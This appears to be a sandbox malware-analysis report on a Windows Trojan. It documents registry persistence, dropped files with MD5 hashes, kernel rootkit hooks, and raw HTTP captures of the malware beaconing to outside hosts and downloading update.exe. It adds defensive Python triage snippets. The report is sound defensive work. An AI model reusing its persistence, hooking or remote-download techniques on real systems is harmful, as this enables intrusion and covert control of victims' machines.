[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Flags" = "1"

[HKLM\System\CurrentControlSet\Services\cnprov]
"DisplayName" = "cnprov"
"ErrorControl" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 F6 9D 75 AB 13 28 BB D4 5B 87 F2 8A 73 1A 6D"

[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0\HELPDIR]
"(Default)" = "C:\PROGRA~1\OCINS\"

[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\TypeLib]
"(Default)" = "{7605CC7B-00FD-4A5F-BAFD-828342DE6279}"

[HKLM\System\CurrentControlSet\Services\cnprov]
"Type" = "1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"Icon" = "%Program Files%\OCINS\config.exe,216"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Version" = "*"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\ProgID]
"(Default)" = "IEAux.IEHlprObj.1"

[HKCR\IEAux.IEHlprObj]
"(Default)" = "IEAux Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch" = "http://client.jogo.cn/cdn/browser/customsearch/customsearch-en.html"
"SearchAssistant" = "http://client.jogo.cn/cdn/browser/sidesearch/sidesearch-en.html"

The following driver will be automatically launched by the OS Loader:

[HKLM\System\CurrentControlSet\Services\cnprov]
"Start" = "0"

To run itself automatically each time Windows starts, the Trojan adds a link to its file under the following system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IdnSvr" = "%Program Files%\OCINS\idnsvr.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\cnprov]
"InstallPath"
"DeleteFlag"
"SystemRoot"

[HKCU\Console]
"KwUnSelf"

The Trojan disables automatic startup of the application by deleting the following autorun value(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"uninsrest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"renewup"
"ExFilter"

The process setup.exe:3264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 62 4C 73 7C 66 E1 4B 61 7E 2D 32 FB 5D 52 AA"

The process %original file name%.exe:1712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 42 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"soft256.exe" = "soft256"
"cnnic_1009.exe" = "cnnic_1009"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process idnsvr.exe:4052 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 04 AB 01 43 81 A1 56 B7 94 93 23 C0 0F C3 E8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

The Trojan deletes the following value(s) in system registry:

[HKCU\Console]
"KwUnSelf"

Dropped PE files

MD5 File path
9f230f967a8607b7565cfcb83d963a96 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cndsv.dll
b06090ee2881c1bac0d275b17d140d3b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cnprov.sys
3d8a11f1dc9127afc415a3c5aa0f4ab8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cnprovh.dll
bc69dffa76af3297b653bfc814f7b87f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\config.exe
57b46fc2b9cb59275cdcfb5e1722f48f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\convs.dll
135ab6cf712cd9fc4b5cd55d71e781c0 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnreg.dll
70019002fdac4580e81d7ff75fb598db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnsvr.dll
2312b02cf8c50bc32cdb0686a9c3ac96 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnsvr.exe
59edc983e52851d195e7c61e8efad602 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\ieaux.dll
c8d32d9ce600888693ccb1864bf6bdd2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\loader.exe
088efc555a77d8d35a9ff367ca48d86f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\setup.dll
a4bf929fdcb401b8cfd9fd212686907e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\setup.exe
5af44e42174649b95758b0e5ef79adf6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\uninstall.exe
6401dc5833d65f4d95bd6e8f78fdf8a1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\cnnic_1009.exe
f2324a0a589478957b66b967c8d95d8c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\m4.exe
3872b1238b8e6c1b92c20e63b6560009 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\soft256.exe
f2324a0a589478957b66b967c8d95d8c c:\MP3\svchost.exe
0a96acb043f1c72e088a46358bb1b5a3 c:\Program Files\OCINS\austr.dll
9f230f967a8607b7565cfcb83d963a96 c:\Program Files\OCINS\cndsv.dll
3d8a11f1dc9127afc415a3c5aa0f4ab8 c:\Program Files\OCINS\cnprovh.dll
bc69dffa76af3297b653bfc814f7b87f c:\Program Files\OCINS\config.exe
57b46fc2b9cb59275cdcfb5e1722f48f c:\Program Files\OCINS\convs.dll
70019002fdac4580e81d7ff75fb598db c:\Program Files\OCINS\idnsvr.dll
2312b02cf8c50bc32cdb0686a9c3ac96 c:\Program Files\OCINS\idnsvr.exe
05cc443897f1b818b45ee0678c9e506f c:\Program Files\OCINS\ieaux.dll
764abdae9880ab1c3ea725a9bb62b784 c:\Program Files\OCINS\uninstall.exe
0a96acb043f1c72e088a46358bb1b5a3 c:\Program Files\OCINS\update\austr.dll
f6a405cded18319b910822cfceb03af7 c:\Program Files\OCINS\update\update.exe
041f9424d638ddc0ff8f21d44ded7c72 c:\WINDOWS\system32\drivers\cnprov.sys
d5bb1996768ed9f61915be739a1fcc43 c:\WINDOWS\system32\setup.exe.tmp
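A first triage pass on this table is to correlate rows by hash rather than by path. It shows which staged files in Temp\2 were installed unchanged into Program Files\OCINS, that the bytes dropped as m4.exe reappear as c:\MP3\svchost.exe (a system binary name, and the name of the process the report lists as an injection target), and that the installed cnprov.sys, ieaux.dll and uninstall.exe are not byte-identical to the staged copies. The following Python is an added example and not part of the original report; it embeds the table above as its input, and the short list of system binary names it checks against is an illustrative assumption of mine.

```python
"""Triage the dropped-file table by MD5: which staged files were installed
unchanged, which were copied under a new name, and which installed copies
differ from their staged versions."""
from collections import defaultdict
import ntpath

# Rows of the "Dropped PE files" table above (MD5, path), embedded as a
# constant so this runs offline.
DROPPED = r"""
9f230f967a8607b7565cfcb83d963a96 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cndsv.dll
b06090ee2881c1bac0d275b17d140d3b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cnprov.sys
3d8a11f1dc9127afc415a3c5aa0f4ab8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\cnprovh.dll
bc69dffa76af3297b653bfc814f7b87f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\config.exe
57b46fc2b9cb59275cdcfb5e1722f48f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\convs.dll
135ab6cf712cd9fc4b5cd55d71e781c0 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnreg.dll
70019002fdac4580e81d7ff75fb598db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnsvr.dll
2312b02cf8c50bc32cdb0686a9c3ac96 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\idnsvr.exe
59edc983e52851d195e7c61e8efad602 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\ieaux.dll
c8d32d9ce600888693ccb1864bf6bdd2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\loader.exe
088efc555a77d8d35a9ff367ca48d86f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\setup.dll
a4bf929fdcb401b8cfd9fd212686907e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\setup.exe
5af44e42174649b95758b0e5ef79adf6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2\uninstall.exe
6401dc5833d65f4d95bd6e8f78fdf8a1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\cnnic_1009.exe
f2324a0a589478957b66b967c8d95d8c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\m4.exe
3872b1238b8e6c1b92c20e63b6560009 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\soft256.exe
f2324a0a589478957b66b967c8d95d8c c:\MP3\svchost.exe
0a96acb043f1c72e088a46358bb1b5a3 c:\Program Files\OCINS\austr.dll
9f230f967a8607b7565cfcb83d963a96 c:\Program Files\OCINS\cndsv.dll
3d8a11f1dc9127afc415a3c5aa0f4ab8 c:\Program Files\OCINS\cnprovh.dll
bc69dffa76af3297b653bfc814f7b87f c:\Program Files\OCINS\config.exe
57b46fc2b9cb59275cdcfb5e1722f48f c:\Program Files\OCINS\convs.dll
70019002fdac4580e81d7ff75fb598db c:\Program Files\OCINS\idnsvr.dll
2312b02cf8c50bc32cdb0686a9c3ac96 c:\Program Files\OCINS\idnsvr.exe
05cc443897f1b818b45ee0678c9e506f c:\Program Files\OCINS\ieaux.dll
764abdae9880ab1c3ea725a9bb62b784 c:\Program Files\OCINS\uninstall.exe
0a96acb043f1c72e088a46358bb1b5a3 c:\Program Files\OCINS\update\austr.dll
f6a405cded18319b910822cfceb03af7 c:\Program Files\OCINS\update\update.exe
041f9424d638ddc0ff8f21d44ded7c72 c:\WINDOWS\system32\drivers\cnprov.sys
d5bb1996768ed9f61915be739a1fcc43 c:\WINDOWS\system32\setup.exe.tmp
"""

# Well-known Windows binary names that legitimately live only under the
# system directories. A short illustrative list (my assumption), not exhaustive.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

def parse_table(text):
    """Return [(md5, path)] from 'md5 path' lines; paths may contain spaces."""
    rows = []
    for line in text.strip().splitlines():
        md5, path = line.split(None, 1)
        rows.append((md5.lower(), path.strip()))
    return rows

def group_by_hash(rows):
    """md5 -> list of paths carrying that exact content."""
    by_hash = defaultdict(list)
    for md5, path in rows:
        by_hash[md5].append(path)
    return dict(by_hash)

def renamed_copies(by_hash):
    """Same bytes dropped under more than one file name (m4.exe -> svchost.exe)."""
    out = []
    for md5, paths in by_hash.items():
        names = sorted({ntpath.basename(p).lower() for p in paths})
        if len(names) > 1:
            out.append((md5, names))
    return sorted(out)

def diverging_names(rows):
    """File names seen with more than one hash: the installed copy is not
    byte-identical to the staged one (re-packed, patched or a different build)."""
    hashes = defaultdict(set)
    for md5, path in rows:
        hashes[ntpath.basename(path).lower()].add(md5)
    return sorted(n for n, h in hashes.items() if len(h) > 1)

def masquerades(rows):
    """Paths that borrow a system binary's name outside the system directories."""
    hits = []
    for _, path in rows:
        name = ntpath.basename(path).lower()
        parent = ntpath.dirname(path).lower()
        if name in SYSTEM_NAMES and not parent.startswith(SYSTEM_DIRS):
            hits.append(path)
    return hits

if __name__ == "__main__":
    rows = parse_table(DROPPED)
    by_hash = group_by_hash(rows)
    for md5, paths in by_hash.items():
        if len(paths) > 1:
            print(md5, "->", " | ".join(paths))
    print("renamed:", renamed_copies(by_hash))
    print("diverging:", diverging_names(rows))
    print("masquerades:", masquerades(rows))
```

Running it against this table yields eight hashes present at more than one path, one renamed copy (m4.exe and c:\MP3\svchost.exe), three names whose installed hash differs from the staged one, and one masquerading path. The diverging cnprov.sys is the one to pull from %System%\drivers for analysis, since that is the copy the rootkit section below refers to, not the staged one in Temp\2.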

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\drivers\cnprov.sys" the Trojan monitors process creation and termination by registering a process-creation notify routine.
Using the driver "%System%\drivers\cnprov.sys" the Trojan monitors thread creation and termination by registering a thread-creation notify routine.
Using the driver "%System%\drivers\cnprov.sys" the Trojan monitors executable images being mapped into memory by registering a load-image notify routine.
The Trojan installs kernel-mode hooks on the following native system services (Zw* entries), most of them registry key and value operations:

ZwClose
ZwCreateKey
ZwCreateThread
ZwDeleteKey
ZwDeleteValueKey
ZwEnumerateValueKey
ZwOpenKey
ZwQueryValueKey
ZwReplaceKey
ZwRestoreKey
ZwSetSecurityObject
ZwSetSystemInformation
ZwSetValueKey

Using the driver "%System%\drivers\cnprov.sys" the Trojan replaces the IRP major-function dispatch entries of the NTFS file system driver, routing the following file operations through its own handlers:

MJ_CREATE
MJ_CLOSE
MJ_READ
MJ_WRITE
MJ_SET_INFORMATION

Using the driver "%System%\drivers\idnaux.sys" the Trojan replaces IRP dispatch entries on the device objects of the tcpip.sys driver, routing the following requests through its own handlers (note that idnaux.sys does not appear in the dropped PE files table above; only cnprov.sys does):

MJ_CLOSE
MJ_DEVICE_CONTROL
MJ_INTERNAL_DEVICE_CONTROL

Using the driver "%System%\drivers\cnprov.sys" the Trojan replaces the IRP major-function dispatch entries of the FastFAT file system driver, routing the following file operations through its own handlers:

MJ_CREATE
MJ_CLOSE
MJ_READ
MJ_WRITE
MJ_SET_INFORMATION

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 114688 35840 5.5358 5b547387783d91b4b3e6beaaea639923
.rsrc 118784 12288 9728 4.02815 11196967b6fe974fa5d94b67be64252e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://update.jogo.cn/cdnClient/update/v26_p/version.dat
hxxp://update.jogo.cn/cdnClient/update/v26_p/data2.cab
hxxp://50.117.116.117/down/wxpSetup256.txt
hxxp://jump.knet.cn/stat/stat
hxxp://jump.knet.cn/stat/first
hxxp://50.117.120.254/down/wxpSetup256.txt
hxxp://update.jogo.cn/cdnClient/update/v26_p/update.exe
hxxp://www5.softuu.cn/down/wxpSetup256.txt 50.117.116.117
update.cnnic.cn 202.173.11.10
jump.cnnic.cn 202.173.11.132


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /stat/first HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 53

sid=1001&pid=0000&sw=C_gr294&sp=002.006.000.000&drv=1
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Wed, 16 Apr 2014 08:33:48 GMT


POST /stat/stat HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 183

sid=0102&pid=C_gr294&sp=002.006.000.000&cid=aaamcjdlnpcpaaamcjdlnpcpdadadadadadadadadadadadadadadadadadadadbmdilgeogeapgmjlebcngahefeaommfomlhgempgjljdpjaggoogjhoifimlgpjhb0003&bind=0
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1806
Date: Wed, 16 Apr 2014 08:33:48 GMT
Connection: close
[Apache Tomcat/7.0.22 HTML error page; inline stylesheet omitted]
HTTP Status 500 -
type: Exception report
message:
description: The server encountered an internal error () that prevented it from fulfilling this request.
exception: java.io.FileNotFoundException: /home/knet/stat/cfg/url.properties (No such file or directory)
    java.io.FileInputStream.open(Native Method)
    java.io.FileInputStream.<init>(FileInputStream.java:120)
    java.io.FileInputStream.<init>(FileInputStream.java:79)
    java.io.FileReader.<init>(FileReader.java:41)
    net.knowledgeservice.pub.util.FileUtil.fileToArray(FileUtil.java:103)

<<< skipped >>>

GET /cdnClient/update/v26_p/data2.cab HTTP/1.1
Host: update.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache



[binary response body (data2.cab); not shown]
HTTP/1.1 200 OK
Date: Wed, 16 Apr 20

<<< skipped >>>

GET /cdnClient/update/v26_p/version.dat HTTP/1.1
Host: update.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 16 Apr 2014 08:33:46 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 08:54:32 GMT
ETag: "292a0e9-1e2-48b7d5e0e2200"
Accept-Ranges: bytes
Content-Length: 482
Connection: close
Content-Type: text/plain; charset=UTF-8
[version]
ver=2.6.0.42
[update]
url=hXXp://update.cnnic.cn/cdnClient/update/v26_p/version.dat
[stat]
stat=hXXp://jump.cnnic.cn/stat/stat
live=hXXp://jump.cnnic.cn/stat/first
uninstall=hXXp://jump.cnnic.cn/stat/uninstall
[exe]
version=2.6.0.12
url=hXXp://update.cnnic.cn/cdnClient/update/v26_p/update.exe
[cab]
version=2.6.0.32
url=hXXp://update.cnnic.cn/cdnClient/update/v26_p/data.cab
[relay]
url=hXXp://update.cnnic.cn/cdnClient/update/v26_p/data2.cab
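This manifest drives the update chain visible in the capture: the client reports itself as sp=002.006.000.000, reads ver=2.6.0.42 from [version], posts FromTo=(002.006.000.000-002.006.000.042) to /stat/stat, and then fetches update.exe and data2.cab from the [exe] and [relay] URLs. The following Python is an added example, not code from the page or from the software it describes. It embeds the captured version.dat (defanging undone so the values read as the client sees them), parses it, reproduces the zero-padded version notation, and builds the same form body. The stat_body helper and the assumption that the client compares dotted versions numerically are mine.

```python
"""Parse the cnnic update manifest (version.dat) and reproduce the version
check and the /stat/ form body the client produces from it."""
import configparser

# Manifest as captured above, embedded for an offline run.
VERSION_DAT = """[version]
ver=2.6.0.42
[update]
url=http://update.cnnic.cn/cdnClient/update/v26_p/version.dat
[stat]
stat=http://jump.cnnic.cn/stat/stat
live=http://jump.cnnic.cn/stat/first
uninstall=http://jump.cnnic.cn/stat/uninstall
[exe]
version=2.6.0.12
url=http://update.cnnic.cn/cdnClient/update/v26_p/update.exe
[cab]
version=2.6.0.32
url=http://update.cnnic.cn/cdnClient/update/v26_p/data.cab
[relay]
url=http://update.cnnic.cn/cdnClient/update/v26_p/data2.cab
"""

def parse_manifest(text):
    """section -> {key: value}; the file is plain INI, so configparser suffices."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return {s: dict(cp.items(s)) for s in cp.sections()}

def pad_version(v):
    """'2.6.0.42' -> '002.006.000.042', the notation seen in sp= and FromTo=."""
    parts = [int(p) for p in v.split(".")]
    parts += [0] * (4 - len(parts))
    return ".".join(f"{p:03d}" for p in parts[:4])

def version_tuple(v):
    return tuple(int(p) for p in v.split("."))

def plan_update(manifest, installed):
    """What the client would fetch and report, or None if already current.
    Numeric comparison of the dotted version is an assumption."""
    latest = manifest["version"]["ver"]
    if version_tuple(latest) <= version_tuple(installed):
        return None
    return {
        "from_to": f"({pad_version(installed)}-{pad_version(latest)})",
        "exe_url": manifest["exe"]["url"],
        "cab_url": manifest["cab"]["url"],
        "relay_url": manifest["relay"]["url"],
        "stat_url": manifest["stat"]["stat"],
    }

def stat_body(sid, **fields):
    """Form body of a /stat/ beacon, e.g. sid=0104&os=6&FromTo=(...)."""
    return "&".join([f"sid={sid}"] + [f"{k}={v}" for k, v in fields.items()])

if __name__ == "__main__":
    m = parse_manifest(VERSION_DAT)
    plan = plan_update(m, "2.6.0.0")
    print(plan)
    print(stat_body("0104", os=6, FromTo=plan["from_to"]))
```

Note that the manifest is fetched over plain HTTP and carries no signature or hash for update.exe, so anyone who can answer for update.cnnic.cn decides which executable the client runs next.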


GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www2.softuu.cn
Connection: Keep-Alive
Cookie: PHPSESSID=hpu1peah8f6ekmonnpelhl7k24


HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:30 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224
[gzip-compressed chunked HTML body (first chunk 0x1224 bytes); not shown]

<<< skipped >>>

GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www3.softuu.cn
Connection: Keep-Alive
Cookie: PHPSESSID=qekkaf4qlu6hc6dmgbnt9onfp1


HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:27 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224
[gzip-compressed chunked HTML body (first chunk 0x1224 bytes); not shown]

<<< skipped >>>

GET /cdnClient/update/v26_p/update.exe HTTP/1.1
Host: update.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 16 Apr 2014 08:33:51 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 09:00:08 GMT
ETag: "292a0e8-6bc80-48b7d72151600"
Accept-Ranges: bytes
Content-Length: 441472
Connection: close
Content-Type: application/octet-stream
[binary PE image: MZ header, DOS stub "This program cannot be run in DOS mode", .text section visible; 441472-byte body not shown]

<<< skipped >>>

GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www5.softuu.cn
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:57 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Set-Cookie: PHPSESSID=l0471imf8i68j3bo1abkea0tm3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224
[gzip-compressed chunked HTML body (first chunk 0x1224 bytes); not shown]

<<< skipped >>>

GET /down/wxpSetup256.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www4.softuu.cn
Connection: Keep-Alive
Cookie: PHPSESSID=kc4506f6moav0eu2hecipfahm4


HTTP/1.1 404 Not Found
Server: Tengine/1.4.2
Date: Wed, 16 Apr 2014 08:31:46 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1224
[gzip-compressed chunked HTML body (first chunk 0x1224 bytes); not shown]

<<< skipped >>>

POST /stat/stat HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 25

sid=1005&pid=0&sw=C_gr294
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1806
Date: Wed, 16 Apr 2014 08:33:49 GMT
Connection: close
[Apache Tomcat/7.0.22 HTML error page; inline stylesheet omitted]
HTTP Status 500 -
type: Exception report
message:
description: The server encountered an internal error () that prevented it from fulfilling this request.
exception: java.io.FileNotFoundException: /home/knet/stat/cfg/url.properties (No such file or directory)
    java.io.FileInputStream.open(Native Method)
    java.io.FileInputStream.<init>(FileInputStream.java:120)
    java.io.FileInputStream.<init>(FileInputStream.java:79)
    java.io.FileReader.<init>(FileReader.java:41)
    net.knowledgeservice.pub.util.FileUtil.fileToArray(FileUtil.java:103)

<<< skipped >>>

POST /stat/stat HTTP/1.1
Host: jump.cnnic.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash,*/*
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 54

sid=0104&os=6&FromTo=(002.006.000.000-002.006.000.042)
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1806
Date: Wed, 16 Apr 2014 08:33:49 GMT
